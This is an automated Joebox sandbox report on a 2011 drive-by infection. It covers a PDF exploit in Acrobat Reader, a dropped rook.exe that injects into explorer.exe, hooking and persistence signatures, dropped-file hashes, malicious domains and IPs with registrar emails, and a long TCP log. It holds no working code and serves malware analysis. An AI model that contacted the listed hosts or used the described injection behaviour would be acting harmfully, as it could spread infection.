
Joebox - Abstract Analysis File 10354
+ General information
Joebox version: 4.5.0
Start time: 14:51:28
Start date: 08/12/2011
Overall analysis duration: 0h 4m 8s
Target binary file name:
Target script file name: new_Mal_URL.jbs
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 1
Number of existing drivers analysed: 0
Number of injected processes analysed: 3
Errors:
  • Too many NtWriteVirtualMemory calls (excessive behavior)
  • Too many NtProtectVirtualMemory calls (excessive behavior)
  • Too many NtSetInformationFile calls (excessive behavior)
  • Too many NtReadVirtualMemory calls (excessive behavior)
+ Classification / Threat Score
Persistence, Installation, Boot Survival:
Hiding, Stealthiness, Detection and Removal Protection:
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection:
Spreading:
Exploiting:
Networking:
Data spying, Sniffing, Keylogging, Ebanking Fraud:
+ Signature Detections
  • Creates files inside the user directory
  • Creates temporary files
  • Executable is probably coded in Java
  • Executes batch files
  • Printf formatting strings found in memory and binary data
  • Queries a list of all running processes
  • Spawns processes
  • URLs found in memory or binary data
  • Creates an autostart registry key
  • Downloads files from web servers via HTTP
  • Found strings which match known social media URLs
  • Performs DNS lookups
  • Posts data to web server
  • Registers a DLL
  • Allocates a big amount of executable memory (probably used for heap spraying)
  • Allocates memory in foreign processes
  • Creates a thread in another existing process (thread injection)
  • Disables the phishing filter of Internet Explorer 8
  • Hooks clipboard functions (used to sniff clipboard data)
  • Hooks Winsock functions (used for sniffing or altering network traffic)
  • Injects a PE file into a foreign process
  • Modifies the prolog of usermode functions (usermode inline hooks)
  • PDF exploit detected (malicious Acrobat Reader behavior, loads network DLL)
  • Writes to foreign memory regions
Analysis Overview
+ Startup
  • system is xp2
  • iexplore.exe (PID: 1712 MD5: 55794B97A7FAABD2910873C85274F409)
    • AcroRd32.exe (PID: 1732 MD5: 80660C611B596FFE8AF4074B31AA6FB7)
      • regsvr32.exe (PID: 1008 MD5: FBDB9D0935B9907B809B381FDDF1627F)
      • regsvr32.exe (PID: 1852 MD5: FBDB9D0935B9907B809B381FDDF1627F)
    • 0.7663042396006076.exe (PID: 580 MD5: 74185020DEA5693BC25348C6AF34CF87)
      • rook.exe (PID: 488 MD5: 8EFB904B16A3F86CC163744D85AECB5F)
        • explorer.exe (PID: 1520 MD5: 12896823FB95BFB3DC9B46BCAEDC9923)
        • ctfmon.exe (PID: 1788 MD5: 5F1D5F88303D4A4DBC8E5F97BA967CC3)
        • wscntfy.exe (PID: 1860 MD5: F92E1076C42FCD6DB3D72D8CFE9816D5)
      • cmd.exe (PID: 2152 MD5: 6D778E0F95447E6546553EEEA709D03C)
    • regsvr32.exe (PID: 652 MD5: FBDB9D0935B9907B809B381FDDF1627F)
    • regsvr32.exe (PID: 1004 MD5: FBDB9D0935B9907B809B381FDDF1627F)
  • cleanup
+ Dropped Files
File Path MD5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat 7613D0FA5F4D15F16592A6830797CC32
C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 8EFB904B16A3F86CC163744D85AECB5F
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi 69C095F96CAA7BA8F677EC34D68E94F6
+ Involved Domains
Name IP Name Server ASN ASN Description ANS State Registrar e-Mail
firedepartment.mobi 174.121.93.116 ns2.firedepartment.mobi ns1.firedepartment.mobi unknown unknown US GoDaddy.com, Inc. (146) scall@srvfire.ca.gov
zespolpickup.pl 188.40.51.83 dns10.linuxpl.com ns10.linuxpl.com unknown unknown DE domeny@ConsultingService.pl
southfloridazulunation.com 97.74.215.96 ns32.domaincontrol.com ns31.domaincontrol.com unknown unknown US GODADDY.COM, INC. dinah.lopez@yahoo.com
combijump.com 46.45.137.206 0101domain1.mars.orderbox-dns.com 0101domain1.earth.orderbox-dns.com 0101domain1.venus.orderbox-dns.com 0101domain1.mercury.orderbox-dns.com unknown unknown TR 0101 INTERNET, INC. korpicsscan@skynet.be
+ Involved IP Addresses
IP ASN ASN Description ANS State
78.14.232.12 unknown unknown IT
125.27.159.156 unknown unknown TH
195.186.1.121 unknown unknown CH
195.186.4.121 unknown unknown CH
79.14.160.118 unknown unknown IT
Global Network Data
+ All TCP
Timestamp Source Port Dest Port Source IP Dest IP
Dec 8, 2011 14:52:25.810642958 CET 1060 80 192.168.0.13 174.121.93.116
Dec 8, 2011 14:52:25.810668945 CET 80 1060 174.121.93.116 192.168.0.13
Dec 8, 2011 14:52:25.812552929 CET 1060 80 192.168.0.13 174.121.93.116
Dec 8, 2011 14:52:25.828499079 CET 1060 80 192.168.0.13 174.121.93.116
Dec 8, 2011 14:52:25.828515053 CET 80 1060 174.121.93.116 192.168.0.13
Dec 8, 2011 14:52:41.196527958 CET 80 1060 174.121.93.116 192.168.0.13
Dec 8, 2011 14:52:41.329301119 CET 1060 80 192.168.0.13 174.121.93.116
Dec 8, 2011 14:52:41.329319954 CET 80 1060 174.121.93.116 192.168.0.13
Dec 8, 2011 14:52:41.548461914 CET 1060 80 192.168.0.13 174.121.93.116
Dec 8, 2011 14:52:45.476460934 CET 80 1060 174.121.93.116 192.168.0.13
Dec 8, 2011 14:52:45.476905107 CET 1060 80 192.168.0.13 174.121.93.116
Dec 8, 2011 14:52:46.328530073 CET 1060 80 192.168.0.13 174.121.93.116
Dec 8, 2011 14:52:53.446762085 CET 1061 80 192.168.0.13 188.40.51.83
Dec 8, 2011 14:52:53.446790934 CET 80 1061 188.40.51.83 192.168.0.13
Dec 8, 2011 14:52:53.447143078 CET 1061 80 192.168.0.13 188.40.51.83
Dec 8, 2011 14:52:53.480904102 CET 1061 80 192.168.0.13 188.40.51.83
Dec 8, 2011 14:52:53.480918884 CET 80 1061 188.40.51.83 192.168.0.13
Dec 8, 2011 14:52:58.175259113 CET 80 1061 188.40.51.83 192.168.0.13
Dec 8, 2011 14:52:58.179575920 CET 1061 80 192.168.0.13 188.40.51.83
Dec 8, 2011 14:52:58.179647923 CET 80 1061 188.40.51.83 192.168.0.13
Dec 8, 2011 14:52:58.179927111 CET 1061 80 192.168.0.13 188.40.51.83
Dec 8, 2011 14:52:59.785891056 CET 1062 80 192.168.0.13 97.74.215.96
Dec 8, 2011 14:52:59.785914898 CET 80 1062 97.74.215.96 192.168.0.13
Dec 8, 2011 14:52:59.786180973 CET 1062 80 192.168.0.13 97.74.215.96
Dec 8, 2011 14:52:59.798469067 CET 1062 80 192.168.0.13 97.74.215.96
Dec 8, 2011 14:52:59.798485041 CET 80 1062 97.74.215.96 192.168.0.13
Dec 8, 2011 14:53:01.639601946 CET 80 1062 97.74.215.96 192.168.0.13
Dec 8, 2011 14:53:01.778433084 CET 1062 80 192.168.0.13 97.74.215.96
Dec 8, 2011 14:53:02.229739904 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:02.229763985 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:02.230009079 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:02.240076065 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:02.240091085 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:12.882401943 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:12.992649078 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:12.993182898 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:12.993201971 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.074637890 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.075123072 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.075139046 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.100866079 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.101392031 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.101406097 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.101679087 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.184125900 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.185746908 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.186127901 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.186142921 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.186392069 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.210247040 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.277775049 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.278289080 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.278434038 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.297413111 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.303925991 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.304418087 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.326728106 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.326735973 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.327200890 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.327322006 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.412672997 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.418225050 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.418623924 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.418637991 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.419140100 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.419555902 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.441718102 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.442126989 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.500230074 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.582045078 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.582560062 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.582573891 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.582830906 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.607848883 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.634463072 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.634908915 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.634924889 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.635195971 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.716190100 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.717453003 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.717833996 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.717850924 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.826776981 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.827297926 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.827313900 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.827430964 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.887440920 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.887970924 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.888710976 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.889017105 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.889054060 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.889067888 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.889442921 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.949018955 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.949527025 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.949542999 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.005007982 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.005475044 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.005490065 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.035461903 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.035974979 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.035990000 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.036266088 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.085923910 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.112148046 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.112572908 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.112587929 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.138356924 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.138828993 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.138843060 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.139117956 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.145379066 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.164731979 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.165182114 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.165195942 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.165462017 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.196243048 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.197933912 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.198344946 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.198359966 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.222281933 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.222737074 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.222752094 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.223021984 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.254308939 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.292392969 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.292833090 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.292848110 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.309551954 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.309978962 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.309993029 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.358685970 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.359164000 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.359179974 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.359455109 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.369182110 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.369189024 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.369569063 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.392654896 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.393075943 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.393091917 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.395411968 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.395793915 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.395807028 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.396043062 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.449728966 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.451631069 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.451987028 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.451999903 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.452183962 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.452282906 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.452296019 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.452567101 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.477669001 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.477675915 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.478363037 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.478480101 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.478492022 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.501835108 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.502317905 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.502332926 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.502662897 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.504091978 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.504100084 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.504498005 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.504600048 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.533726931 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.576687098 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.577030897 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.577244997 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.577260017 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.577570915 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.577685118 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.584544897 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.599361897 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.599718094 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.599730968 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.793359041 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:25.272623062 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:25.272643089 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:26.431772947 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:26.431802988 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:26.433655977 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:26.495893002 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:26.495907068 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:28.364690065 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:28.568957090 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:28.568974018 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:28.787219048 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:28.787234068 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:28.822779894 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:28.823160887 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:28.823175907 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:28.823395967 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:28.939625025 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:28.965637922 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:28.966058969 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:28.966073990 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.072233915 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.072643042 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.072655916 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.169538975 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.169991016 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.170006037 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.170232058 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.195401907 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.339335918 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.339351892 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.378094912 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.378498077 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.378514051 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.378855944 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.513328075 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.539587021 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.540016890 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.540035009 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.565788031 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.566095114 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.566108942 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.747587919 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.751043081 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.751060009 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.754525900 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.775697947 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.803563118 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.803843021 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.803858995 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.804017067 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.818563938 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.829833031 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.830091953 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.830106974 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.830317974 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.919872999 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.922491074 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.946266890 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.946274996 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.947150946 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.972834110 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.973092079 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.973107100 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.973313093 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.003525972 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.029987097 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.031104088 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.031119108 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.031287909 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.070009947 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.113099098 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.113368034 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.113384008 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.122236967 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.122447968 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.122461081 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.123224974 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.144026995 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.161576033 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.161772966 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.161787987 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.170207977 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.171506882 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.171520948 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.171689987 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.201133966 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.287933111 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.288194895 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.288209915 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.314218998 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.314637899 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.314651966 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.314898014 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.333839893 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.340703964 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.341161966 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.341176033 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.341398954 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.377310038 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.397001982 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.400460958 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.400476933 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.403935909 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.404484987 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.404494047 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.407938004 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.421133041 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.491004944 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.558264017 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.558742046 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.558758974 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.559050083 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.574574947 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.584633112 CET 80 1063 46.45.137.206 192.168.0.13
